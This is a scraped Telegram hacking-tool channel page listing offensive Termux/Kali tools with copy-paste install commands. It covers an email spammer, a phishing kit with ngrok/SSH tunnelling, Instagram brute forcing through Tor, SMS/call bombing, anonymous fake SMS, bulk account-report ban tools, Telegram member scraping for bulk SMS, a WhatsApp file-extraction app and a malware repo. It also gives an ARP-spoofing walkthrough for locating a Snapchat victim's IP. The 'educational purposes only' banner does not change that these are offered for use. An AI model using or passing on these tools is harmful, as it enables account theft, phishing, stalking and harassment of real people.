TERMUX COMMANDD
25.6K subscribers
554 photos
80 videos
10 files
157 links
πŸ₯‡THIS IS THE TOP TERMUX CHANNEL ON TELEGRAM WITH 1000+ TOOLSπŸͺ©

πŸšͺHOUSE OF PENTESTER

⚑ Β©ALL CONTENT PROVIDED BY THIS CHANNEL IS MEANT FOR EDUCATIONAL PURPOSES ONLYπŸ”Ί


ADS - @MARONADS
Download Telegram
EMAIL- SPAMMER
Great script for sending and spaming emails! gmail, yahoo, outlook, hotmail.

Install
apt updade
apt upgrate
pkg install git
pkg install python
git clone https://github.com/mishakorzik/Email-Spammer
pip3 install requests
pip3 install smtp

Need help with installation
1. If you have problems installing the requests library: python3 -m pip install requests, smtp
2. If modules cannot be downloaded: replace pkg with apt
3. If you do not know how to delete the repository: rm -rf Email-Spammer
4. if nothing helped you, then you can use the alternative below
πŸ‘‡πŸ»πŸ‘‡πŸ»πŸ‘‡πŸ»πŸ‘‡πŸ»πŸ‘‡πŸ»πŸ‘‡πŸ»πŸ‘‡πŸ»πŸ‘‡πŸ»πŸ‘‡πŸ»πŸ‘‡πŸ»πŸ‘‡πŸ»πŸ‘‡πŸ»πŸ‘‡πŸ»
πŸ‘9❀2πŸ‘2
Install with pypi

pip install sendtomail

## Usage
from sendtomail import *
for i in range(10):
server.send(region, email, text)
# All Regions: de, uk, us, it, es, tw, cn, ar, au

## Example
>>> from sendtomail import *
>>> server.send("us", "he1zen@null.net", "hello, its a test message!")
b'200'
>>>

## Status codes
200 - Succesfully send
400 - bad options
429 - Too Many emails sended
500 - Internal Server Error
503 - Service Unavailable


Enter a command to start Email-Spamer
Custom Email (custom_spam.py):
cd Email-Spammer
python custom_spam.py

Data Email (data_email.py):
cd Email-Spammer
python data_email.py

ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘16❀1
WHPHISHER
The best tool for phishing with the most famous pages updated.

Tested on:
Termux, Kali Linux and debian

Steps
To make this tool less likely to fail, it is advised to install the latest version of Termux, and the Termux API.

How to install --
pkg install bash
pkg install git
git clone https://github.com/WhBeatZ/WhPhisher.git
cd WhPhisher
chmod +x *
bash requisitoswh.sh


Solution if the link is not generated or does not work (2 solutions)
- - - Solution 1 - - -
Open new session
cd NgrokWh
chmod +x ngrokwh.sh
./ngrokwh.sh
and
ngrok http 8080

Solution 2 - - -
Steps:
We open a new session
cd
pkg install openssh -y
ssh -R 80:localhost:8080 nokey@localhost.run


ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘13❀4
FBREPORT
Remove Facebook Account ( Bulk Report )

Command line
$ apt update && apt upgrade
$ apt install python2
$ apt install git
$ git clone https://github.com/bhikandeshmukh/fbreport.git
$ cd fbreport
$ ls
$ unzip Report.zip
$ python2 Report.py


ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘12❀1
This media is not supported in your browser
VIEW IN TELEGRAM
Youtube Bot Auto Comment
Coming sooon 🫑
Youtube-Auto-Commenter
Youtube Bot Auto Commenter Using Puppeter and NodeJS

Run / Installation
How to run ?
> git clone https://github.com/tegal1337/Youtube-Auto-Commenter/
> cd Youtube-Auto-Commenter
> npm install
> node main.js


dont forget to change the google username and password in config.js
module.exports = {
keywords: "keywords",
usernamegoogle: "username",
passwordgoogle: "pass",
};


Requirements
Windows / Linux
Google Chrome
a Youtube account


Running on android
but you need ubuntu installed on your android , use Termux for it! and install ubuntu desktop with Andronix i prefer ubuntu 20 , cuz it's more stable than 18
command for installing inside the ubuntu


> apt instal
> apt update
> apt upgrade
> apt install chromium-browser
> apt install npm
> npm install -g n
> n install lts
> hash -r
> apt install curl
> curl -sS https://dl.yarnpkg.com/debian/pubkey.gpg | apt-key add -
> echo "deb https://dl.yarnpkg.com/debian/ stable main" | tee /etc/apt/sources.list.d/yarn.list
> apt install yarn


go to directory of this project , then install the dependency
yarn
also you need to change executableFilePath in main.js you can set to /usr/bin/chromium
πŸ‘7❀1
❗❗❗How To Get IP Address Of Any Snapchat User❗❗❗

πŸ‘¨β€πŸ’»Easy MITM Attack

πŸ“œRequired:
- Mac OS X / Kali Linux ( Or Any UNIX )
- A Phone Where You Have Snapchat On ( Im Assuming Its A Phone )
- Nmap
- Some Tools And Little MITM Knowledge !

πŸ‘¨β€πŸ«Here Is The Tut:

πŸŒ€Download Wireshark
Here
πŸŒ€Download Arpspoof Here - MACOS only - Kali Linux Has This Already!

1. Fire Up Terminal And Ip Forward Your Laptop/pc With This Scripts:
Kali -
sudo sysctl net.ipv4.ip_forward = 1
sudo net.ipv4.ip_forward = 1
Mac - sudo sysctl -w net.inet.ip.forwarding=1

2. Find Your Phone Device Local Ip And Write It Down.
Nmap -sn <gateway ip>/24
Ex. nmap -sn (or -sP) 192.168.0.1/24

3. Spoof Your Phone.
arpspoof -i <interface> -t <phone ip> gateway
Ex(mac): arpspoof -i en0 -t 192.168.0.160 192.168.0.1

4. Fire up wireshark and filter On Your Phone Ip With Stun Protocol
ip.addr == <phone ip> && stun
Ex: ip.addr == 192.168.0.160 && stun

5. Call Your Victim On Snap And Keep Calling Him For Around 5 Seconds.

πŸŒ€They Do Not Need Necessary To Answer
You Will See On Wireshark Some Binding Requests, Then Some Other Stun Ones.


ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘10
INSTA-HACK
All in one Instagram hacking tool available (Insta information gathering, Insta brute force, Insta account auto repoter)

Available On
Termux{ NO ROOT }
Kali Linux

Test On:
Termux
ANDROID 6+


INSTALLATION [Termux]
apt update
apt upgrade
pkg install python
pkg install python2
pkg install git
git clone https://github.com/HackerSM9/insta-hack
ls
cd insta-hack
pip3 install -r requirements.txt
chmod +x *
bash setup

INSTALLATION [Kali Linux]
sudo apt install python
sudo apt install python2
sudo apt install git
git clone https://github.com/HackerSM9/insta-hack
ls
cd insta-hack
pip3 install -r requirements.txt
chmod +x *
sudo bash insta-hack.sh

ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘21❀7πŸ‘Ž7πŸ”₯6πŸ‘2πŸ₯°1
π™’π™ƒπ˜Όπ™ π™†π™„π™‰π˜Ώ π™Šπ™ π™π™Šπ™Šπ™‡π™Ž π˜Ώπ™Š π™”π™Šπ™ π™‰π™€π™€π˜Ώ? π™π™€π™Œπ™π™€π™Žπ™ 𝙃𝙀𝙍𝙀 πŸ‘‡πŸ» 🫑
πŸ‘9πŸ”₯3❀1
WhatsappHack
A Free Script to Build Android App to Hack and Extract WhatsApp Image Files.

Installation on Kali Linux:
Install dependencies:
# apt-get update
# apt-get install openjdk-8-jdk
# apt-get install gradle

Use Java8:
Get Java8 dir with command:
# update-alternatives --list java

Copy and replace dir on terminal:
# update-alternatives --set java /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java

Download Android Studio:
https://developer.android.com/studio

Installing Android Studio:
# unzip ~/Downloads/android*.zip -d /opt

Run Android Studio:
# cd /opt/android-studio/bin
# ./studio.sh

Go to SDK Manager (Configure -> SDK Manager) and Download:
Android SDK Build-tools, Android SDK-tools, Android SDK platform-tools, Support Repository

Run script:
# git clone https://github.com/cyberlawd/whatsapphack
# cd whatshack/
# ./whatshack.sh



On First Time, Choose "n" when asked to build, then open the project on Android Studio:
cd /opt/android-studio/bin
./studio.sh
πŸ‘18❀4πŸ”₯1
Import Gradle Project: Choose whatsapphack app folder: whatsapphack/app/ Wait all dependencies downloading, if you got errors, click on showed links to solve. Try build from Android Studio: Build > build APK's Click on showed links if you got errors. Close Android after building successfully. open with any Text Editor the file app/build.gradle remove "google()" change gradle version from: 4.4.1 to: 2.2.0 save and exit. Run script (as root): # ./whatshack.sh

ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘4❀1
Youtube Video Hack
with this tool you can download videos for free

Depencies
Wifi: had wifi
Ram : 320 Mb
Root: No Root


Installing for termux
apt upgrade
termux-setup-storage
apt install git
git clone https://github.com/mishakorzik/YoutubeVideoHack
cd YoutubeVideoHack
bash install.sh

Now you can share any Youtube video with Termux and you will be ask to select the quality of your downloaded video and after that, It will be automatically Downloaded
SuccesFull installed!

ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘11❀2πŸ‘Ž2πŸ€—1
xinsta_brute
Xinsta_brute is a tool written on Bash. using this tool we can able perform Bruteforce attack over Instagram. This tool crack Instagram password with 10M Pass List. we have implemented Tor service so there is no matter Blocking IP. This tool works on both rooted Android device and Non-rooted Android device.


The Tool is for
β€’Kali Linux
β€’Termux


Commands to run tool in ur Termux
pkg update && pkg upgrade -y
pkg install git -y
git clone https://github.com/hackerxphantom/xinsta_brute
cd xinsta_brute
bash setup


Type Above Command bash setup Wait For Some minute
Warn:- don't exit old terminal/session
Now Open New Terminal/Session And Type Below command:-


bash xinsta_brute.sh


Commands to run tool in ur Kali Linux
sudo apt-get update && pkg upgrade -y
sudo apt-get install git -y
git clone https://github.com/hackerxphantom/xinsta_brute
cd xinsta_brute
bash setup

ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘17❀3
TBomb v2.0
An open-source SMS/call bomber for Termux.

About Tool:
The script requires working network connection to work.
No balance will be deducted for using this script to send SMS/calls.
While doing infinite bombing use 2-3 seconds delay and 10 to 20 threads for maximum performance.
Don't put spaces in between phone number (Ex- 99999 99999)
Make sure you are using the latest version of TBomb
Make sure you are using Python3.


Features:
sms bombing
call bombing
mail bombing
whatsapp bombing
Frequent updates

Test On:
Termux
Mi Note 9 pro


INSTALLATION [Termux] :
apt update
apt upgrade
pkg install python
pkg install python2
pkg install git
git clone https://github.com/IncredibleHacker/TBomb2.0
ls
cd TBomb2.0
pip2 install requirements.txt
chmod +x TBomb2.0.sh
./TBomb.sh Or bash TBomb2.0.sh

ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘14❀2πŸ‘Ž2
Uidcr3k
random facebook id cloning tool                                                                                                                                            
INSTALL TOOL ON TERMUX
$ pkg update && pkg upgrade
$ pkg install python
$ pip install mechanize requests bs4
$ pkg install git
$ git clone https://github.com/Azim-vau/uidcr3k.git

RUN SCRIPT

$ cd uidcr3k
$ git pull
$ python uidcr3k.py


ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘5πŸ”₯5
InstaReport
This is a script which reports targeted instagram accounts and instagram videos in bulk. Version : 2.0.1

Features
This is a script which reports targeted instagram account or an instagram video. Works On
[+] Powerful ban tool
[+] Uses proxy + username
[+] Mass report on instagram account
[+] Mass report on instagram video



Requirements
Python3 Or Above
No need to install git in linux or termux
Download GIT


INSTALLATION [Termux] (Not working for android right now)
apt update
apt upgrade
pkg install python
pkg install python3
pkg install git
git clone https://github.com/Crevils/InstaReport
cd instareport
pip install -r requirements.txt
chmod +x *
bash setup.sh OR python ReportBot.py

INSTALLATION [Windows]
Download python and git

git clone https://github.com/Crevils/InstaReport
cd instareport
pip install -r requirements.txt
python ReportBot.py

[ - ] If You Don't want to install git then download this tool zip manually

INSTALLATION [Kali Linux]
sudo apt install python
sudo apt install python3
sudo apt install git
git clone https://github.com/Crevils/InstaReport
cd instareport
pip3 install -r requirements.txt
chmod +x *
sudo bash setup.sh


ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘10❀4πŸ‘Ž4😁2
TUNNEL
Use Ngrok In Termux With Advanced Options

TESTED ON :
Termux (ngrok token)

INSTALLATION [Termux] :
apt-get update -y
apt-get upgrade -y
pkg install python -y
pkg install python2 -y
pkg install git -y
pip install lolcat
git clone https://github.com/noob-hackers/tunnel
cd $HOME
ls
cd tunnel
ls
bash tunnel.sh


[+]-- You can select any option by clicking on your keyboard

[+]-- Note:- Don't delete any of the scripts included in core files

ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘11❀1
FAKE-SMS
A small script to send messages anonymously. very fast and secure SMS sending script.

Note-
If ur message is not sent then use some valid vpn like nordvpn etc and make sure you are connected to some europe networks.

Requirements
1. Make sure python3 is installed in windows Or in Linux
2. pip install termcolor
3. pip install requests

Installation
1. For Linux Users:
a) git clone https://github.com/machine1337/fake-sms
b) cd fake-sms
c) pip install requirements.txt
d) python3 fakesms.py


2. For Windows Users:
a) Download python3 on windows and install it
b) git clone https://github.com/machine1337/fake-sms
c) pip install requirements.txt
d) python fakesms.py


Usage:
*. For Linux:
1. python3 fakesms.py
*. For Windows:
1. python fakesms.py

Features:
1. SMS ANONYMOUSLY
2. SUPER FAST SMS SENDING
3. INTERNATIONAL SMS SENDING AVAILABLE
4. YOU CAN SEND ONLY ONE SMS PER DAY
5. NO CHARGES ON SENDING SMS
6. VERY EASY TO USE


ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘14❀2
TELEGRAM-SCRAPER 🫧
telegram group scraper tool. fetch all information about group members

API Setup
Go to https://my.telegram.org and log in.
Click on API development tools and fill the required fields.
put app name you want & select other in platform Example :
copy "api_id" & "api_hash" after clicking create app ( will be used in
setup.py )

How To Install and Use
$ pkg install -y git python
$ git clone https://github.com/th3unkn0n/TeleGram-Scraper.git
$ cd TeleGram-Scraper

Install requierments
python3 setup.py -i

setup configration file ( apiID, apiHASH )
python3 setup.py -c

To Genrate User Data
python3 scraper.py

( members.csv is default if you changed name use it )
Send Bulk sms To Collected Data

python3 smsbot.py members.csv

Update Tool

python3 setup.py -u

ENJOY 🫑 @TERMUXCOMMANDD
πŸ”₯4πŸ‘3❀1
VIRIDAE : Dangerous Malware Repo

Installation
pkg update -y;pkg upgrade -y
git clone https://github.com/Err0r-ICA/Viridae
cd Viridae
pip2 install -r requirements.txt
python2 Viridae

ENJOY 🫑 @TERMUXCOMMANDD
πŸ‘7❀1